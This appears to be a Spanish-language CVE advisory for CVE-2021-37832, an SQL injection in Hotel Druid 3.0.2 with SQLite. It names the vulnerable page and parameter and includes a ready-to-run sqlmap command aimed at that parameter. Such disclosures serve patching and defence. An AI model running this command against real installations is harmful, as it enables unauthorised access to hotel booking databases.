
CVE-2021-37832 - Hotel Druid 3.0.2 Vulnerabilidad de Inyección SQL - 9.8 CVSS 3.1
Existe una vulnerabilidad de inyección SQL en la versión 3.0.2 de Hotel Druid cuando se usa SQLite como base de datos de la aplicación. Un atacante malicioso puede ejecutar comandos SQL en la base de datos SQLite a través del parámetro vulnerable idappartamenti.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37832
https://nvd.nist.gov/vuln/detail/CVE-2021-37832#match-6858716
Página PHP vulnerable:
modifica_app.php - parámetro idappartamenti
Payload vulnerable
sqlmap -u "/modifica_app.php?tipo_tabella=appartamenti&anno=2021&id_sessione=&idappartamenti=01" --level=3 --risk=2 --banner --dbms=sqlite
Descubierto por Joe Helle, julio de 2021